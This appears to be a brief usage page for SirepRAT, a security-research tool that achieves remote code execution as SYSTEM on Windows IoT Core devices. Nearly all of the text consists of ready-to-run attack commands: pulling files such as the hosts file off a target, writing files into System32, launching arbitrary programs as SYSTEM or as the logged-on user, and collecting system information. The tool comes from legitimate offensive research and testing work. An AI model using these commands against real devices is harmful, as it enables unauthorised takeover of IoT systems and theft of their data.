SirepRAT - RCE as SYSTEM on Windows IoT Core
SirepRAT Features full RAT capabilities without the need of writing a real RAT malware on target.
https://github.com/SafeBreach-Labs/SirepRAT#context)
Installation
| # Download the repository
git clone https://github.com/SafeBreach-Labs/SirepRAT.git
# Run the installation
pip install -r requirements.txt
|
Basic usage
Usage
| # Download File bash
python SirepRAT.py $ip GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
# Upload File
python SirepRAT.py $ip PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"
# Run Arbitrary Program
python SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
# With arguments, impersonated as the currently logged on user:
python SirepRAT.py $ip LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
# Try to run it without the as_logged_on_user flag to demonstrate the SYSTEM execution capability)
# Get System Information
python SirepRAT.py $ip GetSystemInformationFromDevice
|
| python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"
|
See help for full details:
| python SirepRAT.py --help
|
Author
Last update: 2024-01-10
Created: January 10, 2024 22:09:40